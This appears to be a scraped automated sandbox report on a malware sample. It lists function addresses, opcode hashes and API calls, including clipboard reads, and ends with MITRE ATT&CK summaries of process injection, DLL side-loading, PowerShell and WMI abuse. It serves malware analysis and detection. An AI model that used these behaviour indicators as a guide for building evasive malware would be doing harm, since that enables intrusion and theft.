Uniqueness Score: -1.00%

Function 02ECD377 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c0ab9d8e908ed14464d132a5d134827dfa759970a7a258c788b99254c2195891
Instruction ID: 96ee0f27bc440daf7790fd41d81558f743fd83515d64296b399dfb72fc64ccea
Opcode Fuzzy Hash: c0ab9d8e908ed14464d132a5d134827dfa759970a7a258c788b99254c2195891
Instruction Fuzzy Hash: 7E11A1B19583459BD310DF68C98476BF7E8FF8A308F18992CE8C993290E7B5D444CB56

Uniqueness

Uniqueness Score: -1.00%

Function 02BF7A5B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298209608.0000000002BF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BF7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bf7000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: f7c51fbb6d5851c2e7e8364cd2e3e48050a5d84e7e1492e3bbd827b944828aab
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 84118272340200AFD744DF55DC80FA6B3EAEB88360B1A80D5EE14CB316DB75E902C760

Uniqueness

Uniqueness Score: -1.00%

Function 02EC1CAB Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
Instruction ID: 7c154c59aa59b9fcce8cd9a0c4ca02e17765b0c5ab3a0b312499a44479fbf2d8
Opcode Fuzzy Hash: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
Instruction Fuzzy Hash: A3113D71644B808BD329CF24C8A4BABBBF1FB02344F44591DD9D797A82D3BAF4498B45

Uniqueness

Uniqueness Score: -1.00%

Function 00411A44 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
Instruction ID: 348a8ba48f1a2f0327b4d46336ec4528d420831e24f9bfe180b1afd1f7eb374e
Opcode Fuzzy Hash: bb7a5bff1dbd84864c30aed502843d58e4c4bf03eb07ee31482e7b1e4368703c
Instruction Fuzzy Hash: 60113D71605B808BD329CF24C8A4BABBBF0FB02344F44491ED5D797A92D3BAF4498B45

Uniqueness

Uniqueness Score: -1.00%

Function 02ED1F2E Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
Instruction ID: 9abff62a7f5fece3e63d8f9a6a2c1fe54c9b42290d485bf0640d6e23e52587dc
Opcode Fuzzy Hash: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
Instruction Fuzzy Hash: F71109B05183419FD304CF14C495B1BBBE1BF86319F459A2DF8D99B241C779C9068B86

Uniqueness

Uniqueness Score: -1.00%

Function 00421CC7 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
Instruction ID: e6a21cfd48ccecce0c7a3d54777b2644280168018e78a496dfdad913fb49de2b
Opcode Fuzzy Hash: e4a0d552d55a3ae7fc323c5b1eedd26187686a65e2406d3e9da2afc67840fd09
Instruction Fuzzy Hash: 661109715183419FD304CF14D495B1BBBE1BB8A318F458A2DF4D5AB241C778D9058B4A

Uniqueness

Uniqueness Score: -1.00%

Function 02EB0D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 8ba7e61abdc42f6b9289604f31a2cb28f4e9514f58fcdfbad42190fa04c2bbea
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: 1701A276A506048FDF22CF24C805BEB33E5FF8631AF4595A5D90A97281E774B9418B90

Uniqueness

Uniqueness Score: -1.00%

Function 02EBFCB0 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
Instruction ID: 58aab6250364a20eb92433d0f2273b376decf5787ba6329865823b164b9f4f8d
Opcode Fuzzy Hash: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
Instruction Fuzzy Hash: 1AD01265D44144C7DE09DA20EC509BB7267DF56304F28B238D49753325EA21A919C945

Uniqueness

Uniqueness Score: -1.00%

Function 0040FA49 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
Instruction ID: de3ce6f7ae6e3d5ea65c66cf0705fbc442ae878a1daf767fd50fb3e27dbea20b
Opcode Fuzzy Hash: af4a12aacc910986abf203bae8f90c7b21e6b9100a76844caf7bcb3b5c156fc4
Instruction Fuzzy Hash: 1AD0C264D04500C7D608DA20FC4196A7222DBA130CF28653DD496232A6E930AD198549

Uniqueness

Uniqueness Score: -1.00%

Function 02EBD3A7 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: 4424c7b2dcc8559f920d32005bf51fbec177e9a3b23430fd36a3322922f1f82d
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: C8D0A7615887A10E97598D3808A08BBFBF4ED4751AB18749EE4D1E310AD320D8018698

Uniqueness

Uniqueness Score: -1.00%

Function 0040D140 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction ID: ef5f6f15fdba078049cde65a2549cec0935e602115ccd1401630279531ef5664
Opcode Fuzzy Hash: ae9cf52e3d41c581a170ec7cf48180e445a84ed293e19ee7d78fcac670432e06
Instruction Fuzzy Hash: 77D0A771A487A10E97588D7808A0477FBE8E947712F1814AFE4D5F7249D638DC05869C

Uniqueness

Uniqueness Score: -1.00%

Function 02EC7494 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 00cfa2a1bd9d8d6983a05bc107cc555247b033b7bebdd7e79f52daa53810972e
Instruction ID: fc63ff7144db230d088183717acfc14d3aba176eca07f96b411a1d117e3a196b
Opcode Fuzzy Hash: 00cfa2a1bd9d8d6983a05bc107cc555247b033b7bebdd7e79f52daa53810972e
Instruction Fuzzy Hash: 62D0127795180A4A9621CF24D981471A7229BC3354734A3444A21633F6DD30D837598C

Uniqueness

Uniqueness Score: -1.00%

Function 02EC47FD Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
Instruction ID: e75f760344972e11c8b48404786a159fb0baaeb0a6ce8aec3f61412875dfe28a
Opcode Fuzzy Hash: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
Instruction Fuzzy Hash: 88C09B1085C9C04BD75DCF245C7E5B5FF354D43144E18B0AEC1931B897E150944D434E

Uniqueness

Uniqueness Score: -1.00%

Function 02EE7EAE Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
Instruction ID: 7bd2b15116bf5bad7ca5f628bad3fa516ab478f3cf40b7ce66427aac778f7d1a
Opcode Fuzzy Hash: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
Instruction Fuzzy Hash: 46C0923CF5D0509FD604DF1AFA51435B2BAABCB305B15F0349006A32ADCE39D8078A0D

Uniqueness

Uniqueness Score: -1.00%

Function 02EE7EAC Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
Instruction ID: a844afcd4e6ff2ab95c3bf38cf52fa4fa5fdc2b1da169be5a4aa5f8981b8c5b9
Opcode Fuzzy Hash: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
Instruction Fuzzy Hash: E3C0922CE990509FD610EF16FA40472B6BAABC7205B15F0208102673ADDE39E807CB8D

Uniqueness

Uniqueness Score: -1.00%

Function 00414596 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
Instruction ID: e75f760344972e11c8b48404786a159fb0baaeb0a6ce8aec3f61412875dfe28a
Opcode Fuzzy Hash: 7b20b59e2086f6dd8b86981b4fe800b4338b1fb813824af916d05cb2e43669e3
Instruction Fuzzy Hash: 88C09B1085C9C04BD75DCF245C7E5B5FF354D43144E18B0AEC1931B897E150944D434E

Uniqueness

Uniqueness Score: -1.00%

Function 00437C47 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
Instruction ID: 7bd2b15116bf5bad7ca5f628bad3fa516ab478f3cf40b7ce66427aac778f7d1a
Opcode Fuzzy Hash: cfeac24bf3772787ead91bc6b722706e668c27b510a24701b3d939e5068ca24c
Instruction Fuzzy Hash: 46C0923CF5D0509FD604DF1AFA51435B2BAABCB305B15F0349006A32ADCE39D8078A0D

Uniqueness

Uniqueness Score: -1.00%

Function 00437C45 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
Instruction ID: 5c4c2a12a684bc4ff0d5a99ec30874bcdf27f0d0682448e5fdc4a84297f01b14
Opcode Fuzzy Hash: 4fd16f70c831f496ab4008e62d33e7b2106f6f3e52052a81b0b1c3f025a68765
Instruction Fuzzy Hash: 87C0926CE9D0609FD200DF17FA40431B2BAABDB305B25F0218041632ADCA3AD8078B0E

Uniqueness

Uniqueness Score: -1.00%

Function 02EDC767 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 153clipboardCOMMON

Download Yara Rule

APIs

GetWindowInfo.USER32(?,?), ref: 02EDC7A8
OpenClipboard.USER32 ref: 02EDC7BA
GetClipboardData.USER32 ref: 02EDC7DD
CloseClipboard.USER32 ref: 02EDC914

Strings

9, xrefs: 02EDC85D
:, xrefs: 02EDC86D
8, xrefs: 02EDC879
;, xrefs: 02EDC865
7, xrefs: 02EDC871

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: Clipboard$CloseDataInfoOpenWindow
String ID: 7$8$9$:$;
API String ID: 2278096442-1017836374
Opcode ID: 74b12f2f732ecc3c7309316f3b7c55f5d553d6d58d37218b91022f32d727fac6
Instruction ID: db800bf9a790f6cf69fa27df402ec549b3fd6bc32968a4d5801b0717b3c88da0
Opcode Fuzzy Hash: 74b12f2f732ecc3c7309316f3b7c55f5d553d6d58d37218b91022f32d727fac6
Instruction Fuzzy Hash: A551AD70548780CFD720DF38C1857A6BBE4AF05394F14EA5ED8DA8B686D335E906CB62

Uniqueness

Uniqueness Score: -1.00%

Function 02ECD8F7 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 02ECD9E4
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 02ECDA0F

Strings

-^, xrefs: 02ECD91E
X&, xrefs: 02ECD926
AV, xrefs: 02ECD916
SE, xrefs: 02ECD90E

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: -^$AV$SE$X&
API String ID: 237503144-3017178743
Opcode ID: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
Instruction ID: f154b38d540b401cb13c12ad6fbc442d6f4a57b95d5966f9d5658366b7b2ffd5
Opcode Fuzzy Hash: 88672712ba695551f4c2e9363b205b4fc2188bcfb2a8aaf974e2784d1cbba389
Instruction Fuzzy Hash: BA718E742483418FE724CF14C8A0BABB7E1EFC6358F118A2CE8E95B290D7759546CB97

Uniqueness

Uniqueness Score: -1.00%

Function 02EC4BB7 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 177COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02EC4C04
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,?,?), ref: 02EC4C35

Strings

2M#O, xrefs: 02EC4C53
<Y.[, xrefs: 02EC4CC5
qrs, xrefs: 02EC4C6B
r]Nm, xrefs: 02EC4DD0

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: 2M#O$<Y.[$r]Nm$qrs
API String ID: 237503144-2765572984
Opcode ID: b4209384774e64906f4bd2642607d0db43ac134c72471375abf5c82cf001131c
Instruction ID: 794d5b1beb98e185947c26800d6db8b7944fb99ad8aef17cf347458f625980fb
Opcode Fuzzy Hash: b4209384774e64906f4bd2642607d0db43ac134c72471375abf5c82cf001131c
Instruction Fuzzy Hash: 6851E3B46483409BD720CF54C8A1BABB7F5EFC6324F05991CF9858B2D1E3B49801CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02ECE1B7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 140COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,00000000,?), ref: 02ECE2F4
RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000001E,00000000,?,?), ref: 02ECE323

Strings

ru, xrefs: 02ECE242
M3, xrefs: 02ECE3D8, 02ECE3DC

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: ru$M3
API String ID: 237503144-652937946
Opcode ID: 103d3fe5a7db0c83f1ebe805be3a67d3ced831ce374e262ff3f3ddc4eeca0531
Instruction ID: eb579268984cec9a3d4f8951e9de4564882824f2511b5991d6c692009245d9a3
Opcode Fuzzy Hash: 103d3fe5a7db0c83f1ebe805be3a67d3ced831ce374e262ff3f3ddc4eeca0531
Instruction Fuzzy Hash: 9A5151B1108381AFE714CF00C990B5BBBE5ABC6354F10892DF8A94B380C775DA46CB92

Uniqueness

Uniqueness Score: -1.00%

Function 02EC3783 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 02EC3848
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 02EC3879

Strings

E&eb, xrefs: 02EC39EE

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: E&eb
API String ID: 237503144-175690455
Opcode ID: f175120c04625626270d9f4230c6652a575bedf3d9f98b4f8ced415559b9b3ff
Instruction ID: 5e7601fd32ac3232652fc0fb831a62975d607b6e5dc294d0a53e58c3d42df29e
Opcode Fuzzy Hash: f175120c04625626270d9f4230c6652a575bedf3d9f98b4f8ced415559b9b3ff
Instruction Fuzzy Hash: 81619271640B409FD328CF64C981B67B3E6AF84314F24EA2CE4AAC76D4E774B545CB51

Uniqueness

Uniqueness Score: -1.00%

Function 0041351C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 216COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,00000000,00000000,?), ref: 004135E1
RtlExpandEnvironmentStrings.NTDLL(00000000,?,?,?,?,?), ref: 00413612

Strings

E&eb, xrefs: 00413787

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: E&eb
API String ID: 237503144-175690455
Opcode ID: 121384bb134e3370c515887561e4bff28e3ea622f5c04769a53e04112e5161fb
Instruction ID: 3627e64b03e8dace2a403a76fce9a7d6649682aa9ea1d52bf6d0af3834cb9b1a
Opcode Fuzzy Hash: 121384bb134e3370c515887561e4bff28e3ea622f5c04769a53e04112e5161fb
Instruction Fuzzy Hash: F761A171600B009FD338CF24C882BA7B3E6EB45315F148A2DE4AAC77D0E778B9858B55

Uniqueness

Uniqueness Score: -1.00%

Function 02EE1F37 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 02EE201A

Strings

m%s, xrefs: 02EE1FBF
!EJK, xrefs: 02EE1F73

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: EnvironmentExpandStrings
String ID: m%s$!EJK
API String ID: 237503144-2691780584
Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
Instruction ID: 9266dac1e67613aff4edc8509a72878e31d1d4cbbb5446324abb8f69343ffb7d
Opcode Fuzzy Hash: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
Instruction Fuzzy Hash: 1A2189B14083908FD304CF55D891B5BBBF4FB86358F110A2CF9A6AB280D775D905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00431CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 82COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,00000000,0000000D,m%s,00000008,?), ref: 00431DB3

Strings

m%s, xrefs: 00431D58
!EJK, xrefs: 00431D0C

Memory Dump Source

Source File: 00000000.00000002.2296952471.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2296952471.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_VoGtelkHSn.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: m%s$!EJK
API String ID: 237503144-2691780584
Opcode ID: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
Instruction ID: 1bf3f748f95ab631ae595585e1a386fe61c7083a19ceef915992d3bd27d4ea4a
Opcode Fuzzy Hash: f2095f0ebc42d9bb64772b760357b4197207047565d8c954b7750190abf9d7ce
Instruction Fuzzy Hash: 4D219AB14083908FD304CF15D891B5BBBF4FB8A348F110A2DF9A1AB280D775D905CB96

Uniqueness

Uniqueness Score: -1.00%

Function 02EB8EE7 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 02EB8F65

Strings

in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified, xrefs: 02EB8F24

Memory Dump Source

Source File: 00000000.00000002.2298477137.0000000002EB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2eb0000_VoGtelkHSn.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: in that spellings eleet on play or similarity the internet. primarily is of used glyphs of via or character other the uses reflection ways system their a leetspeak, replacements resemblance it on often modified
API String ID: 621844428-4175449110
Opcode ID: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
Instruction ID: 95fd08da501db92213420454d2aec9f6f13e07811780a553ce39396cbd9c217e
Opcode Fuzzy Hash: fabb64060f129b09b2fb295de89773e3c4aadf7bbb2d4122ec10e8a8cd5565c7
Instruction Fuzzy Hash: 34F049B188820CD6CF12FB76690D2EF7A5FAE11314F04F567E89651314D7349104CAA3

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

